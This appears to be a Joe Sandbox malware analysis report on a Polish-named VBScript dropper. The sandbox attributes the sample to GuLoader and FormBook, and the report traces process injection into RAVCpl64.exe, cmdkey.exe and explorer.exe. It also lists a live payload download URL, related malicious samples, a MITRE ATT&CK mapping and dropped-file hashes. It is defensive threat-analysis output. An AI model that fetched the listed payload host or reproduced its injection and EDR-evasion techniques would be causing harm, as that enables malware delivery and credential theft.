        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D40670 mov eax, dword ptr fs:[00000030h]3_2_32D40670
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D82670 mov eax, dword ptr fs:[00000030h]3_2_32D82670
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D82670 mov eax, dword ptr fs:[00000030h]3_2_32D82670
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D37662 mov eax, dword ptr fs:[00000030h]3_2_32D37662
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D37662 mov eax, dword ptr fs:[00000030h]3_2_32D37662
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D37662 mov eax, dword ptr fs:[00000030h]3_2_32D37662
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D53660 mov eax, dword ptr fs:[00000030h]3_2_32D53660
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D53660 mov eax, dword ptr fs:[00000030h]3_2_32D53660
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D53660 mov eax, dword ptr fs:[00000030h]3_2_32D53660
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D7666D mov esi, dword ptr fs:[00000030h]3_2_32D7666D
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D7666D mov eax, dword ptr fs:[00000030h]3_2_32D7666D
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D7666D mov eax, dword ptr fs:[00000030h]3_2_32D7666D
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DD3608 mov eax, dword ptr fs:[00000030h]3_2_32DD3608
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DD3608 mov eax, dword ptr fs:[00000030h]3_2_32DD3608
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DD3608 mov eax, dword ptr fs:[00000030h]3_2_32DD3608
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DD3608 mov eax, dword ptr fs:[00000030h]3_2_32DD3608
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DD3608 mov eax, dword ptr fs:[00000030h]3_2_32DD3608
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DD3608 mov eax, dword ptr fs:[00000030h]3_2_32DD3608
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6D600 mov eax, dword ptr fs:[00000030h]3_2_32D6D600
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6D600 mov eax, dword ptr fs:[00000030h]3_2_32D6D600
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DFF607 mov eax, dword ptr fs:[00000030h]3_2_32DFF607
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D7360F mov eax, dword ptr fs:[00000030h]3_2_32D7360F
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E14600 mov eax, dword ptr fs:[00000030h]3_2_32E14600
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D40630 mov eax, dword ptr fs:[00000030h]3_2_32D40630
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D70630 mov eax, dword ptr fs:[00000030h]3_2_32D70630
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DC8633 mov esi, dword ptr fs:[00000030h]3_2_32DC8633
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DC8633 mov eax, dword ptr fs:[00000030h]3_2_32DC8633
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DC8633 mov eax, dword ptr fs:[00000030h]3_2_32DC8633
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DED62C mov ecx, dword ptr fs:[00000030h]3_2_32DED62C
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DED62C mov ecx, dword ptr fs:[00000030h]3_2_32DED62C
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DED62C mov eax, dword ptr fs:[00000030h]3_2_32DED62C
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D45622 mov eax, dword ptr fs:[00000030h]3_2_32D45622
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D45622 mov eax, dword ptr fs:[00000030h]3_2_32D45622
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D47623 mov eax, dword ptr fs:[00000030h]3_2_32D47623
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DFF7CF mov eax, dword ptr fs:[00000030h]3_2_32DFF7CF
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D477F9 mov eax, dword ptr fs:[00000030h]3_2_32D477F9
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D477F9 mov eax, dword ptr fs:[00000030h]3_2_32D477F9
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D437E4 mov eax, dword ptr fs:[00000030h]3_2_32D437E4
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D437E4 mov eax, dword ptr fs:[00000030h]3_2_32D437E4
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D437E4 mov eax, dword ptr fs:[00000030h]3_2_32D437E4
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D437E4 mov eax, dword ptr fs:[00000030h]3_2_32D437E4
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D437E4 mov eax, dword ptr fs:[00000030h]3_2_32D437E4
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D437E4 mov eax, dword ptr fs:[00000030h]3_2_32D437E4
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D437E4 mov eax, dword ptr fs:[00000030h]3_2_32D437E4
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6E7E0 mov eax, dword ptr fs:[00000030h]3_2_32D6E7E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D71796 mov eax, dword ptr fs:[00000030h]3_2_32D71796
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D71796 mov eax, dword ptr fs:[00000030h]3_2_32D71796
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DBE79D mov eax, dword ptr fs:[00000030h]3_2_32DBE79D

        HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe File created: temp_executable.exe.0.dr
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtProtectVirtualMemory: Direct from: 0x4C11373
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe NtResumeThread: Indirect: 0x32A43E8D
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe NtQueueApcThread: Indirect: 0x32A3F626
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtClose: Direct from: 0x7FFE38E59E7F
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtMapViewOfSection: Direct from: 0x4C09666
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtMapViewOfSection: Direct from: 0x4C096AA
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtProtectVirtualMemory: Direct from: 0x7FFE6B3E2651
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe NtSetContextThread: Indirect: 0x32A4386D
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDelayExecution: Direct from: 0x4C09745
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtResumeThread: Direct from: 0x4C097BC
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDelayExecution: Direct from: 0x4C0956E
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe NtSuspendThread: Indirect: 0x32A43B7D
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\temp_executable.exe protection: execute and read and write
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Section loaded: NULL target: C:\Windows\SysWOW64\cmdkey.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmdkey.exe Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read write
Source: C:\Windows\SysWOW64\cmdkey.exe Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmdkey.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Thread register set: target process: 7620
Source: C:\Windows\SysWOW64\cmdkey.exe Thread register set: target process: 7620
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Thread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe"
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe"
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Process created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 2_2_004036D7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx, 2_2_004036D7
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information

Source: Yara match, File source: 00000005.00000002.21763322977.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.20223233654.0000000032A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.21763571664.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        Remote Access Functionality

Source: Yara match, File source: 00000005.00000002.21763322977.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.20223233654.0000000032A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.21763571664.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

MITRE ATT&CK Matrix (counts in parentheses are the number of signatures matched for that technique; unnumbered cells are the matrix's default entries that did not match):
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Scripting (121) | Valid Accounts | Native API (1) | Scripting (121) | Access Token Manipulation (1) | Virtualization/Sandbox Evasion (2) | OS Credential Dumping | Security Software Discovery (121) | Remote Services | Archive Collected Data (1) | Encrypted Channel (11) | Exfiltration Over Other Network Medium | System Shutdown/Reboot (1)
Credentials | Domains | Default Accounts | Exploitation for Client Execution (1) | DLL Side-Loading (1) | Process Injection (311) | Access Token Manipulation (1) | LSASS Memory | Virtualization/Sandbox Evasion (2) | Remote Desktop Protocol | Clipboard Data (1) | Ingress Tool Transfer (1) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Abuse Elevation Control Mechanism (1) | Process Injection (311) | Security Account Manager | Process Discovery (1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | DLL Side-Loading (1) | Deobfuscate/Decode Files or Information (1) | NTDS | Application Window Discovery (1) | Distributed Component Object Model | Input Capture | Application Layer Protocol (13) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Abuse Elevation Control Mechanism (1) | LSA Secrets | File and Directory Discovery (2) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Obfuscated Files or Information (4) | Cached Domain Credentials | System Information Discovery (14) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | DLL Side-Loading (1) | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Behavior Graph ID: 1518414. Sample: Zeskanowana lista przedmiot... Start date: 25/09/2024. Architecture: WINDOWS. Score: 100.

Start node: signatures: Malicious sample detected (through community Yara rule); Yara detected FormBook; Yara detected GuLoader; Sigma detected: WScript or CScript Dropper. Contacted host: secretspark.com.bd.
wscript.exe (started): dropped C:\Users\user\AppData\...\temp_executable.exe (PE32). Signatures: Benign windows process drops PE files; VBScript performs obfuscated calls to suspicious functions; Windows Scripting host queries suspicious COM object (likely to drop second stage). Starts temp_executable.exe.
temp_executable.exe (started): dropped C:\Users\user\AppData\Local\...\System.dll (PE32). Signatures: Found stalling execution ending in API Sleep call; Switches to a custom stack to bypass stack traces. Starts temp_executable.exe.
temp_executable.exe (started): network: secretspark.com.bd, 170.249.236.53, port 443, local port 49755, PRIVATESYSTEMSUS, United States. Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Queues an APC in another process (thread injection); Found direct / indirect Syscall (likely to bypass EDR). Injects into RAVCpl64.exe.
RAVCpl64.exe (injected): Signatures: Maps a DLL or memory area into another process; Found direct / indirect Syscall (likely to bypass EDR). Starts cmdkey.exe.
cmdkey.exe (started): Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces. Injects into explorer.exe.
explorer.exe (injected).

Source | Detection | Scanner | Label
Zeskanowana lista przedmiot#U00f3w nr 84329.vbs | 5% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\temp_executable.exe | 8% | ReversingLabs | Win32.Trojan.Generic
        No Antivirus matches
        No Antivirus matches
Source | Detection | Scanner | Label
http://www.quovadis.bm0 | 0% | Avira URL Cloud | safe
https://ocsp.quovadisoffshore.com0 | 0% | Avira URL Cloud | safe
http://crl.mU | 0% | Avira URL Cloud | safe
https://secretspark.com.bd/TkFvuYGGiJLZuopqvpi7.bin | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
secretspark.com.bd | 170.249.236.53 | true | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://secretspark.com.bd/TkFvuYGGiJLZuopqvpi7.bin | false | Avira URL Cloud: safe | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.quovadis.bm0 | temp_executable.exe, 00000003.00000002.20212018694.0000000002512000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ocsp.quovadisoffshore.com0 | temp_executable.exe, 00000003.00000002.20212018694.0000000002512000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.mU | temp_executable.exe, 00000003.00000002.20212018694.0000000002512000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
170.249.236.53 | secretspark.com.bd | United States | 63410 | PRIVATESYSTEMSUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1518414
Start date and time: 2024-09-25 17:17:47 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 17m 42s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name: Suspected Instruction Hammering
Number of analysed new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Zeskanowana lista przedmiot#U00f3w nr 84329.vbs
Detection: MAL
Classification: mal100.troj.evad.winVBS@7/11@1/1
          EGA Information:
          • Successful, ratio: 75%
          HCA Information:
          • Successful, ratio: 81%
          • Number of executed functions: 54
          • Number of non-executed functions: 327
          Cookbook Comments:
          • Found application associated with file extension: .vbs
          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
          • Exclude process from analysis (whitelisted): dllhost.exe
          • Report creation exceeded maximum time and may have missing disassembly code information.
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtEnumerateKey calls found.
          • Report size getting too big, too many NtOpenKey calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtSetInformationFile calls found.
          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          • VT rate limit hit for: Zeskanowana lista przedmiot#U00f3w nr 84329.vbs
Time | Type | Description
11:21:25 | API Interceptor | 11555960x Sleep call for process: cmdkey.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
170.249.236.53 | Gescanntes Artikelliste_Bestellnummer 25477.vbs | malicious | FormBook, GuLoader |

Match | Associated Sample Name / URL | Detection | Threat Name | Context
secretspark.com.bd | Gescanntes Artikelliste_Bestellnummer 25477.vbs | malicious | FormBook, GuLoader | 170.249.236.53

Match | Associated Sample Name / URL | Detection | Threat Name | Context
PRIVATESYSTEMSUS | Gescanntes Artikelliste_Bestellnummer 25477.vbs | malicious | FormBook, GuLoader | 170.249.236.53
PRIVATESYSTEMSUS | https://catch35.com/ | malicious | Unknown | 162.246.59.110
PRIVATESYSTEMSUS | https://www.isobuster.com/dl.php?d=isobuster.com&v=3&l=0 | malicious | Unknown | 104.193.109.63
PRIVATESYSTEMSUS | firmware.armv4l.elf | malicious | Unknown | 192.196.159.200
PRIVATESYSTEMSUS | firmware.armv5l.elf | malicious | Unknown | 192.196.159.200
PRIVATESYSTEMSUS | firmware.x86_64.elf | malicious | Unknown | 170.249.206.146
PRIVATESYSTEMSUS | NEW.P.ORDER .ENQUIRY56433.PDF.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 170.249.217.170
PRIVATESYSTEMSUS | https://content.app-us1.com/LedEn/2024/08/03/19c502f2-d7fc-4021-b067-e9b1cf078dac.pdf | malicious | HTMLPhisher | 158.106.129.201
PRIVATESYSTEMSUS | b2bXo6vmDm.exe | malicious | SystemBC | 158.106.138.119
PRIVATESYSTEMSUS | 93g0DCqh1e.elf | malicious | Mirai | 162.255.160.105

Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | LummaC, Stealc, Vidar | 170.249.236.53
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | LummaC, Vidar | 170.249.236.53
37f463bf4616ecd445d4a1937da06e19 | SDWLLRJcsY.exe | malicious | Remcos, GuLoader | 170.249.236.53
37f463bf4616ecd445d4a1937da06e19 | D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe | malicious | FormBook, GuLoader | 170.249.236.53
37f463bf4616ecd445d4a1937da06e19 | cDErPwSuCB.exe | malicious | Unknown | 170.249.236.53
37f463bf4616ecd445d4a1937da06e19 | tpq.ps1 | malicious | Unknown | 170.249.236.53
37f463bf4616ecd445d4a1937da06e19 | Kv1tZKstAC.exe | malicious | Unknown | 170.249.236.53
37f463bf4616ecd445d4a1937da06e19 | z65orderrequest.bat.exe | malicious | GuLoader, Remcos | 170.249.236.53
37f463bf4616ecd445d4a1937da06e19 | Swift_Copy_401812_301823-30391_#9812_9202938.exe | malicious | GuLoader, PureLog Stealer | 170.249.236.53
37f463bf4616ecd445d4a1937da06e19 | 117532123_20240925-9_MCZB#U00b7pdf.vbs | malicious | Remcos, GuLoader | 170.249.236.53

Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dll | mbdcKkZ3Ag.exe | malicious | GuLoader |
C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dll | mbdcKkZ3Ag.exe | malicious | GuLoader |
C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dll | mydreamudpate.hta | malicious | Cobalt Strike, GuLoader |
C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dll | Thermo Fisher RFQ_TFS-1507.xls | malicious | GuLoader |
C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dll | BCXV7eBAlV.exe | malicious | GuLoader |
C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dll | W9RpT8yapE.hta | malicious | Cobalt Strike, GuLoader |
C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dll | BCXV7eBAlV.exe | malicious | GuLoader |
C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dll | AWB 9869692024 Clearance Doc.exe | malicious | Remcos, GuLoader |
C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dll | AWB 9869692024 Clearance Doc.exe | malicious | GuLoader |
                              Process:C:\Users\user\AppData\Local\Temp\temp_executable.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):417
                              Entropy (8bit):4.274706417309361
                              Encrypted:false
                              SSDEEP:12:7MHAjnXdcHoZQT/D2SmyDL0MXCWj6nKAdUqVM2KT5O4/K:7MgTtJm/D5TRXCWj6KeM5k
                              MD5:378A24843EDB12C44215291AF484EE67
                              SHA1:B4DED39F643CBC9520824C38BAC8D0F6059EE7C5
                              SHA-256:319E0E8A595D2D1135C32AD2027F15B214B5828743104F6BA0032A0BA2102F35
                              SHA-512:D2AC03123DA17450B86F83EB6785DAEDF799579A15D8478FDCCBBE846D95CE56BB4C86DE9F1991715E12DFD97D4F83D11035C64F0720B5C407E60CD445A34C9C
                              Malicious:false
                              Reputation:low
                              Preview:skied oeillet mortalities.afstdningerne fustily gullibility udkrer fatalisters chapelmaster.trkningsrettigheders proletariserer whitecapping skifters clearers piprinae unfusibness erne munity spairge bella..depoters stonily dvrgeflok unprejudicial.besmudses jocker extremism forhoret thermit trforarbejdning.ribgrasses polyaemic closish lixene gunvers sprjtelakeringers speeling growler laurotetanine unsectarianize..
                              Process:C:\Users\user\AppData\Local\Temp\temp_executable.exe
                              File Type:ASCII text, with very long lines (65536), with no line terminators
                              Category:dropped
                              Size (bytes):432938
                              Entropy (8bit):2.6512332223770243
                              Encrypted:false
                              SSDEEP:1536:etn0nQdlo4kvAtpfP9aed6J+pq24l7m3cKDMxWwUnhrGyTMZvbQAsLLGRhSFdID1:gu2/9nsMMTnes2JVtjLFqc13L9XA
                              MD5:5D24DAE263529341D2F078186AD22099
                              SHA1:7A57D1132640DB3482AB3695199DA716432AE5C3
                              SHA-256:52B052B70FE669D4A7E5539E38DE5F1CC27643C3E9E3B2534B181239FA9D81D8
                              SHA-512:5669BB21C1CD95DA1FFDA960EFA87B1F9E388D4399F74C0024FF6DB7623B1185B1B1186C4F2925A7B9F936EC5503EB39F9939CD3B2EE54E7BBAEE12773CCA8E4
                              Malicious:false
                              Reputation:low
                              Process:C:\Users\user\AppData\Local\Temp\temp_executable.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):213490
                              Entropy (8bit):7.539520753048367
                              Encrypted:false
                              SSDEEP:6144:TejneZDOvhWjwEqg8T+a4PKtH9t6vqcG/Zgypl:Ci8vAj5aLY+76ycN2
                              MD5:A80B7D073152513AB1FB5BA43502B497
                              SHA1:9B8735FE1B2FBFDC6A1408F07204EC4B952C54D4
                              SHA-256:311EFC86FA1DE90700448135CE390AF44777E0AF9571DB610624162CD9E98639
                              SHA-512:27FA195D2DFA2DCA849B58F7979DBC2421ECDB3D1F0BC8325E60DBBB69CF60FB62D254C3689AFCC07067AA29B863A17C96A19C66FBD8A1C178DB0C9D4839B360
                              Malicious:false
                              Process:C:\Users\user\AppData\Local\Temp\temp_executable.exe
                              File Type:Matlab v4 mat-file (little endian) \303, numeric, rows 0, columns 0
                              Category:dropped
                              Size (bytes):445365
                              Entropy (8bit):1.2531729362980937
                              Encrypted:false
                              SSDEEP:1536:Cz29hF2g6bysiKqtRjiEfCJbAyqaBPOPmkc9K:M4AA1Tjv48+Gx
                              MD5:4E4F70B2CEA5AC857D3050A4E21F6832
                              SHA1:E46EE1C0F65E8245A045E599656E7757CD6984C8
                              SHA-256:BFE411D37145804B07CA1447AA79692CAB7DBF29084A1807B645B7947BC71C96
                              SHA-512:ADB8200F06E7DFF9BA34017865A3951471E32778EDAC3841BB598CB4E5A2A1E6B91D6CD8EFCF127B2486E53AD466B76CCE4B0563FE6D8D348B22EC0E79E0E726
                              Malicious:false
                              Process:C:\Users\user\AppData\Local\Temp\temp_executable.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):335577
                              Entropy (8bit):1.2535113458554008
                              Encrypted:false
                              SSDEEP:1536:GruBqYqvmx037bWZiy1+1Z02AdwwS/21ujY60Y:WqqYqvyCWC02eUR
                              MD5:483D45AD053613D0866F1BFA1ADD2CC1
                              SHA1:B07481BF677FA9E9BAAD80F3AC6A96D03DADB056
                              SHA-256:F133E0B6BB313AC42AA7DE46CCA592289413FA3D6EB7757894C139059799B95D
                              SHA-512:E72575F2A3C59A77DF2C05F124E4662ABED3C6F63B2A815306AB6759BA989B0DB9BEF161D0CBC2D6BAF69E3456C2E67F474079BA8053F833B800C952416BB965
                              Malicious:false
                              Process:C:\Users\user\AppData\Local\Temp\temp_executable.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):300328
                              Entropy (8bit):1.2422311481187949
                              Encrypted:false
                              SSDEEP:768:JQz4Z/a8KR85+UI1fuw3jm2+TDHwfg/fd1rmKk6MJalXXIkre458MpDLwvYzuMqz:e8KvSPbXBvp8AS2TZ96JmAh
                              MD5:F57039F8803F4EB89D3FCDA8DCC73F68
                              SHA1:539021FE70AA56B90B3C51A8C736B4823C29C178
                              SHA-256:5EFA3FF183AFBD47121C35430E18346712B28A4B503F43B10051996C26857D8A
                              SHA-512:F1AF0F61A7F4FEAB932788A4CF4A0345994CF8F65E450AD40C89D067F14FE236478D843559FAE5E6175636D44BB669F8224B2DFAC6345ACC2E1B208C23FA73C5
                              Malicious:false
                              Process:C:\Users\user\AppData\Local\Temp\temp_executable.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):14991
                              Entropy (8bit):1.2730906934586605
                              Encrypted:false
                              SSDEEP:96:86MWYAl+kypSdltIrchSHlyxQid21fX2W/5EeW+Y:86rYA+kTh3h4id21fGG5EeW+Y
                              MD5:50FAD5C454CB963B9FE90E52C94D7D1E
                              SHA1:FAE94575F9F01D4C7EA5B71B33CE5C20E8F58780
                              SHA-256:E1313B78830D596DAC0FA2BFE8801FD6E539DF8D1614CFAAC76712407F68646C
                              SHA-512:C68B05A2E35E16733B966347E441E26531B1A6A9A777976E93F81191951110478490978B3D667F6E47AB4B271B9AD657F14F1834F0E085F0C238C5322E20743C
                              Malicious:false
                              Process:C:\Users\user\AppData\Local\Temp\temp_executable.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):271412
                              Entropy (8bit):1.2583214297628365
                              Encrypted:false
                              SSDEEP:768:ss00Zex8KPD3fpe9j0LVj5L9Vxok4D6BHZRMfam5N6dYaR+jWeaybNw1J3h91qpV:LajLVfVCWiNP8oyZe3r
                              MD5:0011B4FCEA11597D004FEBE62052FC53
                              SHA1:69934B76F8F98A59E8F198E361586FAAA5BA51BC
                              SHA-256:4F69039FD8F163A715A6A5C2216308A008BBB9685B62F7896E36553F7DAFF7C2
                              SHA-512:347B5123DACB39683D1BC4CB39F3F556C2110AB712A627BEAB8529C2A80BDD35C303921BABB433682978DA4FDE6A83C88F2FD96668DAA41EC1C7DD6AA4AAFACB
                              Malicious:false
                              Process:C:\Users\user\AppData\Local\Temp\temp_executable.exe
